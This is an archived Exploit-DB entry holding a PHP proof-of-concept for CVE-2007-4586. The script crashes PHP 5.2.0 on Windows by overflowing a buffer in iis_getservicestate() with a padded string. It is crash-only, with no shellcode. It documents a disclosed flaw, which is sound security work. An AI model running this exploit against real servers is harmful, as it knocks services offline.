PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow

Author: boecke
type: dos
platform: windows_x86
port: 
date_added: 2007-08-26  
date_updated: 2016-10-19  
verified: 1  
codes: OSVDB-36847;CVE-2007-4586  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comphp-5.2.0-Win32.zip  

raw file: 4318.php  
<?php
// ==================================================================================
//
//  php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
//      Discovery: boecke <boecke@herzeleid.net>
//      Risk: Local Buffer Overflow (Medium - High Risk)
//      Notes: Other exported functions that convert their string argument(s)
//      to Unicode are affected in the same way; iis_getservicestate() is just
//      the one exercised here.
//
//      extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
//      "Sangre, sonando, de rabia naci.. Who do you trust?"
//       - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================

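// Crash-only proof of concept: the padded argument is handed straight to
// iis_getservicestate(), whose Unicode conversion overflows a fixed-size
// buffer on a vulnerable build (see the header notes). The call is not
// expected to return -- the PHP process dies. Run this only against a
// disposable PHP process; if PHP is hosted inside a web server worker the
// crash presumably takes that worker with it.
if ( !extension_loaded( "iisfunc" ) )
{
    die( "Extension not loaded.\n" );
}

// Pad length defaults to the original 256 bytes. An optional first CLI
// argument (positive integer) overrides it so the overflow threshold can be
// probed without editing the script. $argv is only populated under the CLI
// SAPI, so the default is used everywhere else.
$pad_len = 256;
if ( isset( $argv[1] ) )
{
    if ( !ctype_digit( $argv[1] ) || (int) $argv[1] < 1 )
    {
        die( "Usage: php 4318.php [pad_length]\n" );
    }
    $pad_len = (int) $argv[1];
}

$buf_unicode = str_repeat( "A", $pad_len );
// Two marker bytes appended after the pad. "AA" is a placeholder, not a
// return address: this PoC only aims to crash, not to redirect execution.
$eip_unicode = "\x41\x41";

$payload = $buf_unicode . $eip_unicode;

// Announce the call before making it so a crash can be attributed to it;
// error_log() reaches stderr on the CLI and the SAPI log elsewhere, and does
// not depend on output buffers that a crashing process never flushes.
error_log( "Calling iis_getservicestate() with " . strlen( $payload ) . " bytes" );

iis_getservicestate( $payload );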

?>

# milw0rm.com [2007-08-27]